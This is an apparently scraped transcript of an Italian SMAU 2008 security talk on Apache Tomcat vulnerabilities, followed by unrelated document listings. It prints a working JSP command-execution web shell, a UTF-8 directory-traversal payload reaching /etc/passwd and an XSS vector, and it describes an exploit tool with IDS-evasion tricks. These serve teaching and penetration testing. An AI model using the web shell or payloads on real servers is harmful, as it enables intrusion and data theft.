Vulnerabilità in Apache Tomcat

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Vulnerabilità in Apache Tomcat"

Transcript

1 Vulnerabilità in Apache Tomcat L evoluzione della specie il mondo della sicurezza è una giungla! SMAU 2008

2 Di cosa parliamo oggi... Quali sono le principali vulnerabilità scoperte in Apache Tomcat Come sfruttare queste debolezze, dal punto di vista dell'aggressore Quali vulnerabilità ci dobbiamo aspettare nel futuro prossimo Attualmente lavoro come pentester in una grande banca internazionale Ricerco vulnerabilità for fun (and profit) Mi interesso di web application security ed ethical hacking Sono membro della comunita OWASP btw: partecipate al capitolo Italiano :) luca.carettoni[at]ikkisoft[dot]com

3 Security in depth Application Security Web Server Security Database Security Operating System Security Network Security Physical Security

4 Apache Tomcat Apache Tomcat è un moderno Servlet container sviluppato dall'apache Software Foundation Pure 100% Java Application Server Open Source, facile da installare, abbastanza performante...quindi, praticamente perfetto? Non proprio Implementa diverse versioni delle tecnologie Java Servlet e Java Server Pages (JSP) Servlet/JSP Specification 2.5/ / / /1.1 Apache Tomcat version (deprecata)

5 Powered by Apache Tomcat E' stato scaricato più di 10 milioni di volte. Ipotizziamo che solamente l'1% di questi download ha portato all'utilizzo in produzione, il risultato è assolutamente sconvolgente Parliamo di più di installazioni Largamente utilizzato da numerose organizzazioni e società: WalMart, O'Reilly On Java, JBOSS ed il portale Italiano VolareGratis.com Si stima che circa la metà della global Fortune 500 utilizzi in una qualche installazione Tomcat e derivati Date un occhio alla popolarità del sito: s/tomcat.html

6 Tomcat in the wild... Google dork: 12,600 for intitle:"directory Listing For /" + inurl:tomcat-docs tomcat

7 Tactical Exploiting 1/3 Spesso l'aggressore non deve nemmeno sfruttare vulnerabilità Sono gli amministratori che lasciano accessibile una risorsa preziosa Default Manager Console LambdaProbe Console Spesso esposta Spesso protetta da password non robuste Per la mia esperienza, troppo spesso!

8 Tactical Exploiting 2/3

9 Tactical Exploiting 3/3 Oltre ad ottenere informazioni sulla configurazione e sullo stato dei sistemi, un aggressore può alterare le configurazioni e compromettere l'ambiente di fruizione! Vediamo, in breve, come: page import="java.io." %><%try { Runtime rt = Runtime.getRuntime(); String cmd = request.getparameter("cmd"); Process ps = rt.exec(cmd); BufferedReader outreader = new BufferedReader(new InputStreamReader( ps.getinputstream())); BufferedReader errreader = new BufferedReader(new InputStreamReader( ps.geterrorstream())); String outline = null; String errline = null; out.println("<pre>"); while ((outline = outreader.readline())!= null (errline = errreader.readline())!= null) { if (outline!= null) out.println("out: " + outline); if (errline!= null) out.println("err: " + errline); } out.println("</pre>"); outreader.close(); errreader.close(); } catch (Exception ex) { out.println("exception message. Some problem?!?"); ex.printstacktrace(); }%>

10 Apache Tomcat - Cronologia La code base iniziale e' stata donata da Sun all' Apache Software Foundation nel 1999 La prima versione ufficiale è stata la v x x x x La versione attuale è la (ad oggi, 18/10/08) Fonte: en.wikipedia.org

11 Vulnerabilità in Tomcat 1/2 #81 Vulnerabilità segnalate #44 CVE (vulnerabilità univoche) Vulnerabilità per versione: Apache Tomcat JK Connectors: #3 CVE Apache Tomcat 4.x: #35 CVE Apache Tomcat 5.x: #24 CVE Apache Tomcat 6.x: #19 CVE Source: (11 September 2008)

12 Vulnerabilità in Tomcat 2/2 CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE Source: (11 September 2008)

13 Vulnerabilità per anno CVEs

14 Vulnerabilità per severità Low High Medium Low: Info Disclosure, Denial of Service Medium: Sensitive Info Disclosure, Cross Site Scripting, Session Hijacking High: Directory Traversal, Lettura/Scrittura File Arbitrari, Esecuzione di Codice Arbitrario

15 Qualche esempio

16 CVE Directory Traversal Vulnerability Author: Simon Ryeo Severity: High Version Affected: , , 4.1.x Exploit Proof-of-concept: %c0%ae/%c0%ae%c0%ae/etc/passwd Note: context.xml oppure server.xml deve permettere allowlinking e URIencoding come UTF8. UTF-8 Encoding 2 bytes, 11bits, 110bbbbb 10bbbbbb %c0%ae =. %c0%af = /

17 CVE Multiple Cross Site Scripting (XSS) Author: Unknown (reported to JPCERT) Severity: Medium Version Affected: , , , , Exploit Proof-of-concept: Note: Nessun tipo di validazione. Il classico vettore di attacco <script>alert(123);</script> viene correttamente inoltrato

18 CVE Directory Listing Vulnerability Author: ScanAlert.s Enterprise Services Team Severity: Medium Version Affected: , , , Exploit Proof-of-concept: Note: Vulnerabile invocando qualsiasi risorsa (estensione) valida, anche se non esistente, preceduta da un punto e virgola

19 Tomcat ZOO The «all-in-one» exploit Pentesting tool, specifico per verificare vulnerabilità note di Apache Tomcat Sviluppato in PHP (richiede solo enable-cli) Rilasciato GPL v2 Attualmente copre il 27% dei CVE per Tomcat: CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE [ Script Options (basic) ] Usage:php TomcatZOO.php host port proxy host: target server port: the web port, usually 8080 proxy: use a proxy defined as IP:PORT:USER:PASS (optional) Example: php TomcatZOO.php php TomcatZOO.php :1234:: php TomcatZOO.php :8080:ikki:pass

20 Tomcat ZOO The «all-in-one» exploit Caratteristiche avanzate: Supporto HTTP (senza l'uso di libcurl) Supporto Proxy Opzione di debug Personalizzazione User-Agent Primitive tecniche di evasione 1: fake HTTP GET/POST parameters 2: random case sensitivity 3: Windows directory separator \ instead of / 4: URL encoding applied to URI, HTTP pars and header ToDo: Supporto HTTPS (per ora utilizzate l'ottimo Thx Michal!) Coprire la globalità delle vulnerabilità di Tomcat analizzabili durante black box testing

21 Tomcat ZOO The «all-in-one» exploit Disponibile prossimamente (entro fine anno) Lo troverete qui: E' un tool per ethical hacking!

22 E nel futuro... Ancora problematiche di validazione dell'input, sebbene il codice si sta stabilizzando Sicuramente ancora Denial of Service, considerando la numerosità e la complessità dei componenti Sicuramente ancora Cross-Site Scripting (Tendenzialmente) nessun buffer overflow. I componenti non sviluppati in Java sono limitati Come difenderci quindi? Reattività: mantenersi aggiornati e preparare già ora un ambiente di test dove provare le future release, prima della messa in produzione. Estote Parati! Online patching: Application firewall e simili, pronti per essere configurati ad-hoc appena viene rilasciata una nuova vulnerabilità

23 Contatti, Domande Grazie dell'attenzione! Domande?!? Luca Carettoni luca.carettoni[at]ikkisoft[dot]com

KLEIS WEB APPLICATION FIREWALL

KLEIS WEB APPLICATION FIREWALL KLEIS WEB APPLICATION FIREWALL VERSIONE 2.1 Presentazione www.kwaf.it Cos'è Kleis Web Application Firewall? Kleis Web Application Firewall (KWAF) è un firewall software per la difesa di: Web Application

Dettagli

TeamPortal. Servizi integrati con ambienti Gestionali

TeamPortal. Servizi integrati con ambienti Gestionali TeamPortal Servizi integrati con ambienti Gestionali 12/2013 Accesso da remoto Accesso da remoto Esempio 1 Sul Firewall devono essere aperte le porte 80 : http (o quella assegnata in fase di installazione/configurazione

Dettagli

TeamPortal. Infrastruttura

TeamPortal. Infrastruttura TeamPortal Infrastruttura 05/2013 TeamPortal Infrastruttura Rubriche e Contatti Bacheca Procedure Gestionali Etc Framework TeamPortal Python SQL Wrapper Apache/SSL PostgreSQL Sistema Operativo TeamPortal

Dettagli

Indice register_globals escaping

Indice register_globals escaping 1 Indice La sicurezza delle applicazioni web Le vulnerabilità delle applicazioni web La sicurezza in PHP: La direttiva register_globals Filtrare l'input Filtrare l'output (escaping) SQL Injection Cross

Dettagli

Scritto mercoledì 1 agosto 2012 13:52 sul sito informaticamente.pointblog.it

Scritto mercoledì 1 agosto 2012 13:52 sul sito informaticamente.pointblog.it Vulnerabilità dei CMS Joomla, Wordpress, ecc. Articoli tratti dal sito html.it e informaticamente.pointblog.it -------------------------------------------------------------------------------------------------------------

Dettagli

Navigazione automatica e rilevazione di errori in applicazioni web

Navigazione automatica e rilevazione di errori in applicazioni web Politecnico di Milano Navigazione automatica e rilevazione di errori in applicazioni web Relatore: Prof. Stefano Zanero Fabio Quarti F e d e r i c o V i l l a A.A. 2006/2007 Sommario Obiettivo: Illustrare

Dettagli

CMS Hacking. Analisi del rischio di utilizzo di applicazioni di terze parti. Gabriele Buratti www.isc2chapter-italy.it

CMS Hacking. Analisi del rischio di utilizzo di applicazioni di terze parti. Gabriele Buratti www.isc2chapter-italy.it CMS Hacking Analisi del rischio di utilizzo di applicazioni di terze parti Gabriele Buratti www.isc2chapter-italy.it Agenda Definizione di CMS Rischi e tendenze (e le ragioni di ciò) Attacchi recenti Perchè

Dettagli

Application Server per sviluppare applicazioni Java Enterprise

Application Server per sviluppare applicazioni Java Enterprise Application Server per sviluppare applicazioni Java Enterprise Con il termine Application Server si fa riferimento ad un contenitore, composto da diversi moduli, che offre alle applicazioni Web un ambiente

Dettagli

Assignment (1) - Varie

Assignment (1) - Varie Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Assignment (1) - Varie Al link http://www.dti.unimi.it/braghin/ elementi/lab/lista_consegnati.pdf

Dettagli

Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it!

Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Assignment (1) - Varie Al link http://www.dti.unimi.it/braghin/ elementi/lab/lista_consegnati.pdf

Dettagli

PTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato

PTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato La scelta migliore per chi vuole diventare un Penetration Tester PTSv2 in breve: Online, accesso flessibile e illimitato 900+ slide interattive e 3 ore di lezioni video Apprendimento interattivo e guidato

Dettagli

RSA Sun Insurance Office Ltd

RSA Sun Insurance Office Ltd RSA Sun Insurance Office Ltd Web Application Security Assessment (http://rsage49:9080/sisweb) Hacking Team S.r.l. Via della Moscova, 13 20121 MILANO (MI) - Italy http://www.hackingteam.it info@hackingteam.it

Dettagli

Attacchi alle Applicazioni Web

Attacchi alle Applicazioni Web Attacchi alle Applicazioni Web http://www.infosec.it info@infosec.it Relatore: Matteo Falsetti Webbit03 Attacchi alle Applicazioni Web- Pagina 1 Applicazioni web: definizioni, scenari, rischi ICT Security

Dettagli

Virtually Pwned Hacking VMware. Claudio Criscione @paradoxengine c.criscione@securenetwork.it

Virtually Pwned Hacking VMware. Claudio Criscione @paradoxengine c.criscione@securenetwork.it Virtually Pwned Hacking VMware Claudio Criscione @paradoxengine c.criscione@securenetwork.it /me Claudio Criscione Il contesto Violare la virtualizzazione significa... hacking al di sotto accedere direttamente

Dettagli

Domenico Ercolani Come gestire la sicurezza delle applicazioni web

Domenico Ercolani Come gestire la sicurezza delle applicazioni web Domenico Ercolani Come gestire la sicurezza delle applicazioni web Agenda Concetti generali di sicurezza applicativa La soluzione IBM La spesa per la sicurezza non è bilanciata Sicurezza Spesa Buffer Overflow

Dettagli

PHP e Java ovvero come poter sfruttare entrambi i linguaggi e vivere felici... forse

PHP e Java ovvero come poter sfruttare entrambi i linguaggi e vivere felici... forse PHP e Java ovvero come poter sfruttare entrambi i linguaggi e vivere felici... forse Relatore: Matteo Baccan matteo@baccan.it Data: Roma 24/1/2009 Target: Programmatori PHP, Java e semplici curiosi Difficoltà:

Dettagli

Simone Riccetti. Applicazioni web:security by design

Simone Riccetti. Applicazioni web:security by design Simone Riccetti Applicazioni web:security by design Perchè il problema continua a crescere? Connettività: Internet L incremento del numero e delle tipologie d vettori di attacco è proporzionale all incremento

Dettagli

Early Warning. Bollettino VA-IT-130911-01.A

Early Warning. Bollettino VA-IT-130911-01.A Early Warning Bollettino VA-IT-130911-01.A Guida alla corretta lettura della scheda riassuntiva Early Warning - Bollettino VA-IT-130911-01.A Pag. 2/6 P U B L I C CORRISPONDENZE EARLY WARNING INFORMAZIONI

Dettagli

DEL SENDER GUIDA INTEGRATIVA ALL INSTALLAZIONE. Versione N.1.0. Data 11/05/2009. Sender - Guida integrativa alla installazione

DEL SENDER GUIDA INTEGRATIVA ALL INSTALLAZIONE. Versione N.1.0. Data 11/05/2009. Sender - Guida integrativa alla installazione GUIDA INTEGRATIVA ALL INSTALLAZIONE DEL SENDER Versione N.1.0 Data 11/05/2009 Versione 1.0, Data emissione 11/05/2009 Pag. 1 di 15 Revisione Capitolo Modifica Data 1.0 Prima Emissione 11/05/2009 Versione

Dettagli

Introduzione al linguaggio Java: Servlet e JSP

Introduzione al linguaggio Java: Servlet e JSP Introduzione al linguaggio Java: Servlet e JSP Corso di Gestione della Conoscenza d Impresa A. A. 2006/2007 Dipartimento di Informatica Università degli Studi di Bari 1 Servlet e JSP: il contesto Un applicazione

Dettagli

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS)

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS) UNIVERSITÀ DEGLI STUDI DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Tesina di Sicurezza nei Sistemi informativi Simona Ullo Attacchi alle applicazioni web: SQL

Dettagli

Oggetto: MASTER DI ALTA FORMAZIONE PROFESSIONALE IN PROGRAMMATORE JAVA PARTECIPAZIONE GRATUITA

Oggetto: MASTER DI ALTA FORMAZIONE PROFESSIONALE IN PROGRAMMATORE JAVA PARTECIPAZIONE GRATUITA Oggetto: MASTER DI ALTA FORMAZIONE PROFESSIONALE IN PROGRAMMATORE JAVA PARTECIPAZIONE GRATUITA Salerno Formazione, società operante nel settore della didattica, della formazione professionale e certificata

Dettagli

Introduzione al tema delle minacce di Phishing 3.0 attraverso tecniche di Cross Application Scripting

Introduzione al tema delle minacce di Phishing 3.0 attraverso tecniche di Cross Application Scripting Introduzione al tema delle minacce di Phishing 3.0 attraverso tecniche di Cross Application Scripting Relatori: Emanuele Gentili Alessandro Scoscia Emanuele Acri PHISHING: l eterna lotta tra Sviluppatori

Dettagli

Guida all Installazione della Binary Release di OpenSPCoop2. Guida all Installazione della Binary Release di OpenSPCoop2

Guida all Installazione della Binary Release di OpenSPCoop2. Guida all Installazione della Binary Release di OpenSPCoop2 Guida all Installazione della Binary Release di OpenSPCoop2 i Guida all Installazione della Binary Release di OpenSPCoop2 Guida all Installazione della Binary Release di OpenSPCoop2 ii Copyright 2005-2015

Dettagli

Le scelte tecnologiche di RUP System

Le scelte tecnologiche di RUP System Cremona 22 novembre 2007 Le scelte tecnologiche di System - Metarete Linguaggio di programmazione Linguaggio di programmazione: Java Semplice e robusto Orientato agli oggetti Indipendente dalla piattaforma

Dettagli

Penetration Test Integrazione nell'attività di internal auditing

Penetration Test Integrazione nell'attività di internal auditing Parma 6 giugno 2008 Penetration Test Integrazione nell'attività di internal auditing CONTENUTI TI AUDIT mission e organizzazione REVISIONE TECNICA mission e organizzazione INTERNAL SECURITY ASSESSMENT

Dettagli

Internet Banking e Web Security

Internet Banking e Web Security Internet Banking e Web Security Giorgio Fedon Chief Operation Officer Minded Security S.r.l. OWASP-Day II Università La Sapienza, Roma 31st, March 2008 giorgio.fedon@mindedsecurity.com Copyright 2008 -

Dettagli

VULNERABILITY ASSESSMENT E PENETRATION TEST

VULNERABILITY ASSESSMENT E PENETRATION TEST VULNERABILITY ASSESSMENT E PENETRATION TEST Una corretta gestione della sicurezza si basa innanzitutto su un adeguata conoscenza dell attuale livello di protezione dei propri sistemi. Partendo da questo

Dettagli

Sicurezza delle applicazioni web

Sicurezza delle applicazioni web Sicurezza delle applicazioni web (Programmazione sicura in ambiente web) Luca Carettoni l.carettoni@securenetwork.it 26 Novembre Linux Day 2005 2005 Secure Network S.r.l. Il peggiore dei mondi... Un server

Dettagli

SPECIFICA DI ASSESSMENT PER I SERVIZI BPOL E BPIOL

SPECIFICA DI ASSESSMENT PER I SERVIZI BPOL E BPIOL SPECIFICA DI ASSESSMENT PER I SERVIZI BPOL E BPIOL ver.: 1.0 del: 21/12/05 SA_Q1DBPSV01 Documento Confidenziale Pagina 1 di 8 Copia Archiviata Elettronicamente File: SA_DBP_05_vulnerability assessment_sv_20051221

Dettagli

Buzzwords Security. Luca Carettoni. The OWASP Foundation. Secure Network S.r.l. l.carettoni@securenetwork.it. http://www.owasp.org

Buzzwords Security. Luca Carettoni. The OWASP Foundation. Secure Network S.r.l. l.carettoni@securenetwork.it. http://www.owasp.org Buzzwords Security Luca Carettoni Secure Network S.r.l. l.carettoni@securenetwork.it OWASP-Day Università La Sapienza Rome 10 th September 2007 Copyright 2007 - The OWASP Foundation Permission is granted

Dettagli

SchoolData. Pagina 1 di 6

SchoolData. Pagina 1 di 6 SchoolData Pagina 1 di 6 Cos è SchoolData: A partire dalle esperienze professionali di singoli docenti e dalle problematiche emerse nella gestione delle programmazioni didattiche di un istituto scolastico

Dettagli

Indice generale. Parte I Anatomia del Web...21. Introduzione...xiii

Indice generale. Parte I Anatomia del Web...21. Introduzione...xiii Indice generale Introduzione...xiii Capitolo 1 La sicurezza nel mondo delle applicazioni web...1 La sicurezza delle informazioni in sintesi... 1 Primi approcci con le soluzioni formali... 2 Introduzione

Dettagli

PAWAS. Gestione sicurezza applicativa

PAWAS. Gestione sicurezza applicativa PAWAS Gestione sicurezza applicativa Sicurezza applicativa P.A. Portali web sicuri CON PAWAS GARANTISCI LA SICUREZZA APPLICATIVA DEI SERVIZI ONLINE DELLA PUBBLICA AMMINISTRAZIONE. Sempre più frequenti

Dettagli

Software utilizzato per le esercitazioni

Software utilizzato per le esercitazioni SW Software utilizzato per le esercitazioni Software utilizzato per le esercitazioni Editor testuale per pagine html, xhtml, css Browser Web server Motore Php Motore JSP JDK JSDK Ambiente di sviluppo Java

Dettagli

Security Scan e Penetration Testing

Security Scan e Penetration Testing Security Scan e Penetration Testing esperienze di una realtà specializzata http://www.infosec.it info@infosec.it Il Net Probing INFOSEC Relatore: Stefano Venturoli Infosecurity 2002 Security Scan e Penetration

Dettagli

LA TECNOLOGIA CONTRO L HACKING

LA TECNOLOGIA CONTRO L HACKING LA TECNOLOGIA CONTRO L HACKING LUCA EMILI RODOLFO ROSINI GIORGIO VERDE E*MAZE Networks S.p.A. I punti che verranno trattati: La sicurezza di siti web, piattaforme di e-business e sistemi di pagamento on-line.

Dettagli

Guida veloce ai. Hacks

Guida veloce ai. Hacks Guida veloce ai OK Hacks Techweaver11.altervista.org Copyright by Techweaver tutti i diritti riservati, no copia ne opere derivate senza il consenso dell autore 1 Introduzione Questa mini guida è stata

Dettagli

Attacco alle WebMail basate su Memova: tampering dei parametri di inoltro automatico

Attacco alle WebMail basate su Memova: tampering dei parametri di inoltro automatico Attacco alle WebMail basate su Memova: tampering dei parametri di inoltro automatico Rosario Valotta Matteo Carli Indice Attacco alle WebMail basate su Memova:... 1 tampering dei parametri di inoltro automatico...

Dettagli

Sicurezza Proattiva. Quadrante della Sicurezza e visione a 360. Roma, 10 maggio 2007

Sicurezza Proattiva. Quadrante della Sicurezza e visione a 360. Roma, 10 maggio 2007 Sicurezza Proattiva Quadrante della Sicurezza e visione a 360 Roma, 10 maggio 2007 Sicurezza Proattiva 2 Introduciamo ora una visione molto più orientata ad un approccio tecnologico relativamente alle

Dettagli

PHP WEB DESIGNER/DEVELOPER

PHP WEB DESIGNER/DEVELOPER Dettaglio corso ID: Titolo corso: Tipologia corso: Costo totale del corso a persona (EURO): Organismo di formazione: Caratteristiche del percorso formativo PHP WEB DESIGNER/DEVELOPER Corsi di specializzazione

Dettagli

REGIONE BASILICATA UFFICIO S. I. R. Standard Tecnologici dei Sistemi Informativi

REGIONE BASILICATA UFFICIO S. I. R. Standard Tecnologici dei Sistemi Informativi UFFICIO S. I. R. Standard Tecnologici dei Sistemi Informativi Autori: Dott.ssa Domenica Nardelli (P.O.C. Area Applicativa Ufficio SIR) Data di creazione: 03 Ottobre 2005 Ultimo aggiornamento: 03 Ottobre

Dettagli

Offerta per attività di Vulnerability Assessment per Portale Servizi del Personale

Offerta per attività di Vulnerability Assessment per Portale Servizi del Personale Milano, 29 Giugno 2005 Spett.le Infocom Via Gandhi 21017 Samarate n. 20050505.mb18b Alla cortese attenzione: Sig. Ruggero Toia Oggetto: per attività di Vulnerability Assessment per Portale Servizi del

Dettagli

Introduzione a XAMPP. Andrea Atzeni (shocked@polito.it) Marco Vallini (marco.vallini@polito.it) Politecnico di Torino Dip. Automatica e Informatica

Introduzione a XAMPP. Andrea Atzeni (shocked@polito.it) Marco Vallini (marco.vallini@polito.it) Politecnico di Torino Dip. Automatica e Informatica Introduzione a XAMPP Andrea Atzeni (shocked@polito.it) Marco Vallini (marco.vallini@polito.it) Politecnico di Torino Dip. Automatica e Informatica Introduzione applicazione web richiede diversi componenti

Dettagli

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report Sommario Introduzione...3 Lista delle Vulnerabilità...3 Descrizione delle vulnerabilità...3 XSS...3 Captcha...4 Login...5

Dettagli

Applicazioni web. Sommario. Parte 6 Servlet Java. Applicazioni web - Servlet. Alberto Ferrari 1. Servlet Introduzione alle API ed esempi

Applicazioni web. Sommario. Parte 6 Servlet Java. Applicazioni web - Servlet. Alberto Ferrari 1. Servlet Introduzione alle API ed esempi Applicazioni web Parte 6 Java Alberto Ferrari 1 Sommario Introduzione alle API ed esempi Tomcat Server per applicazioni web Alberto Ferrari 2 Alberto Ferrari 1 Java: da applet a servlet In origine Java

Dettagli

1. FINALITÀ E DEFINIZIONE DELLE SPECIFICHE TECNICHE E FUNZIONALI

1. FINALITÀ E DEFINIZIONE DELLE SPECIFICHE TECNICHE E FUNZIONALI 1. FINALITÀ E DEFINIZIONE DELLE SPECIFICHE TECNICHE E FUNZIONALI Per implementare una piattaforma di e-learning occorre considerare diversi aspetti organizzativi, gestionali e tecnici legati essenzialmente

Dettagli

Il Web, HTML e Java Corso di Laurea in Ingegneria Informatica Progetto S.C.E.L.T.E.

Il Web, HTML e Java Corso di Laurea in Ingegneria Informatica Progetto S.C.E.L.T.E. Il Web, HTML e Java Corso di Laurea in Ingegneria Informatica Progetto S.C.E.L.T.E. Università di Bologna Facoltà di Ingegneria Bologna, 08/02/2010 Outline Da applicazioni concentrate a distribuite Modello

Dettagli

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer Tecnologie per il Web Il web: architettura e tecnologie principali Una analisi delle principali tecnologie per il web Tecnologie di base http, ssl, browser, server, firewall e proxy Tecnologie lato client

Dettagli

Corso di Web programming Modulo T3 A2 - Web server

Corso di Web programming Modulo T3 A2 - Web server Corso di Web programming Modulo T3 A2 - Web server 1 Prerequisiti Pagine statiche e dinamiche Pagine HTML Server e client Cenni ai database e all SQL 2 1 Introduzione In questa Unità si illustra il concetto

Dettagli

Agenda. IT Security Competence Center Web Application Security. Web Application Security. Tito Petronio 03/03/2011

Agenda. IT Security Competence Center Web Application Security. Web Application Security. Tito Petronio 03/03/2011 IT Security Competence Center Web Application Security Tito Petronio SANS GCFA, GWAS Certified Professional 18 Febbraio 2011 Agenda Web Application Security OWASP Vulnerabilità delle Applicazioni Web Sicurezza

Dettagli

Spett.le CRIF Via M. Fantin, 1-3 40131 Bologna

Spett.le CRIF Via M. Fantin, 1-3 40131 Bologna Spett.le CRIF Via M. Fantin, 1-3 40131 Bologna Milano, 13 Novembre 2006 n. 20061113.mb44 Alla cortese attenzione: Ing. Carlo Romagnoli Dott.ssa Elisabetta Longhi Oggetto: per Attività di Vulnerability

Dettagli

Flavio De Paoli depaoli@disco.unimib.it

Flavio De Paoli depaoli@disco.unimib.it Flavio De Paoli depaoli@disco.unimib.it 1 Il web come architettura di riferimento Architettura di una applicazione web Tecnologie lato server: Script (PHP, Pyton, Perl), Servlet/JSP, ASP Tecnologie lato

Dettagli

CORSO WEB SERVER, DBMS E SERVER FTP

CORSO WEB SERVER, DBMS E SERVER FTP CORSO WEB SERVER, DBMS E SERVER FTP DISPENSA LEZIONE 1 Autore D. Mondello Transazione di dati in una richiesta di sito web Quando viene effettuata la richiesta di un sito Internet su un browser, tramite

Dettagli

Architettura Tecnica i. Architettura Tecnica

Architettura Tecnica i. Architettura Tecnica i Architettura Tecnica ii Copyright 2005-2011 Link.it s.r.l. iii Indice 1 Scopo del documento 1 1.1 Abbreviazioni..................................................... 1 2 Overview 1 2.1 La PdD........................................................

Dettagli

Analisi e valutazione sulla sicurezza delle applicazioni web generate con WebML/WebRatio

Analisi e valutazione sulla sicurezza delle applicazioni web generate con WebML/WebRatio Analisi e valutazione sulla sicurezza delle applicazioni web generate con WebML/WebRatio Progetto per il corso di Argomenti Avanzati di Sistemi Informativi. Prof. Ceri, Ing. Brambilla Politecnico di Milano

Dettagli

Corso Android Corso Online Sviluppo su Cellulari con Android

Corso Android Corso Online Sviluppo su Cellulari con Android Corso Android Corso Online Sviluppo su Cellulari con Android Accademia Futuro info@accademiafuturo.it Programma Generale del Corso di Sviluppo su Cellulari con Android Programma Base Modulo Uno - Programmazione

Dettagli

Introduzione a XAMPP. Andrea Atzeni (shocked@polito.it) Marco Vallini (marco.vallini@polito.it) Politecnico di Torino Dip. Automatica e Informatica

Introduzione a XAMPP. Andrea Atzeni (shocked@polito.it) Marco Vallini (marco.vallini@polito.it) Politecnico di Torino Dip. Automatica e Informatica Introduzione a XAMPP Andrea Atzeni (shocked@polito.it) Marco Vallini (marco.vallini@polito.it) Politecnico di Torino Dip. Automatica e Informatica Introduzione applicazione web richiede diversi componenti

Dettagli

Web Services con Axis Delia Di Giorgio Anna Celada 1 marzo 2005

Web Services con Axis Delia Di Giorgio Anna Celada 1 marzo 2005 Sommario Web Services con Axis Delia Di Giorgio Anna Celada 1 marzo 2005 Introduzione.................................................................................. 1 SOAP........................................................................................

Dettagli

19. LA PROGRAMMAZIONE LATO SERVER

19. LA PROGRAMMAZIONE LATO SERVER 19. LA PROGRAMMAZIONE LATO SERVER Introduciamo uno pseudocodice lato server che chiameremo Pserv che utilizzeremo come al solito per introdurre le problematiche da affrontare, indipendentemente dagli specifici

Dettagli

Introduzione a Windows XP Professional Installazione di Windows XP Professional Configurazione e gestione di account utente

Introduzione a Windows XP Professional Installazione di Windows XP Professional Configurazione e gestione di account utente Programma Introduzione a Windows XP Professional Esplorazione delle nuove funzionalità e dei miglioramenti Risoluzione dei problemi mediante Guida in linea e supporto tecnico Gruppi di lavoro e domini

Dettagli

Offerta per attività Ethical Hacking livello rete e sistemi e applicativo

Offerta per attività Ethical Hacking livello rete e sistemi e applicativo Ethical Hacking retegesi (Gruppo Ras) 20041108.03GP Milano, 08 novembre 2004 Spett.le Gesi S.p.A. Via Oglio, 12 20100 Milano (MI) n. 20041108.03GP Alla cortese attenzione: Dott. Sergio Insalaco Oggetto:

Dettagli

Università di Bergamo Facoltà di Ingegneria. Applicazioni Internet B. Paolo Salvaneschi B6_1 V1.7. JSP parte A

Università di Bergamo Facoltà di Ingegneria. Applicazioni Internet B. Paolo Salvaneschi B6_1 V1.7. JSP parte A Università di Bergamo Facoltà di Ingegneria Applicazioni Internet B Paolo Salvaneschi B6_1 V1.7 JSP parte A Il contenuto del documento è liberamente utilizzabile dagli studenti, per studio personale e

Dettagli

Guida all Installazione del ProxyFatturaPA

Guida all Installazione del ProxyFatturaPA i Guida all Installazione del ii Copyright 2005-2014 Link.it srl iii Indice 1 Introduzione 1 2 Fase Preliminare 1 3 Esecuzione dell Installer 1 4 Fase di Dispiegamento 5 4.1 JBoss 5.x e 6.x....................................................

Dettagli

MEGA Advisor Architecture Overview MEGA 2009 SP5

MEGA Advisor Architecture Overview MEGA 2009 SP5 Revisione: August 22, 2012 Creazione: March 31, 2010 Autore: Jérôme Horber Contenuto Riepilogo Il documento descrive i requisiti sistema e le architetture di implementazione possibili per MEGA Advisor.

Dettagli

Il web server Apache Lezione n. 3. Introduzione

Il web server Apache Lezione n. 3. Introduzione Procurarsi ed installare il web server Apache Introduzione In questa lezione cominciamo a fare un po di pratica facendo una serie di operazioni preliminari, necessarie per iniziare a lavorare. In particolar

Dettagli

Dott. Marcello Pistilli Business Development Manager. del software alla produzione:

Dott. Marcello Pistilli Business Development Manager. del software alla produzione: Direzione Tecnica /BU Sicurezza Dott. Marcello Pistilli Business Development Manager Ethical Hacking, dallo sviluppo del software alla produzione: Code review e Pen testing 07/05/2008 M300-5 FATTORE UMANO

Dettagli

Note pratiche sullo sviluppo di servlet (I)

Note pratiche sullo sviluppo di servlet (I) Note pratiche sullo sviluppo di servlet (I) Nel caso in cui sulla macchina locale (PC in laboratorio/pc a casa/portatile) ci sia a disposizione un ambiente Java (con compilatore) e un editor/ambiente di

Dettagli

OWASP Web Application Penetration Checklist. Versione 1.1

OWASP Web Application Penetration Checklist. Versione 1.1 Versione 1.1 14 Luglio 2004 Questo documento è rilasciato sotto la licenza GNU, e il copyright è proprietà della Fondazione OWASP. Siete pregati di leggere e comprendere le condizioni contenute in tale

Dettagli

Aspetti di sicurezza per l innovazione nel Web

Aspetti di sicurezza per l innovazione nel Web Aspetti di sicurezza per l innovazione nel Web Attacchi tipo Drive-by Downloads e x-morphic Simone Riccetti IBM Security Services Sr. IT Security Architect Agenda Web 2.0: Evoluzione delle minacce Attacchi

Dettagli

Servlet e JDBC. Servlet e Web Server. Servlet e Web Server. Servlet e Web Server. Richieste. Servlet. Servlet:

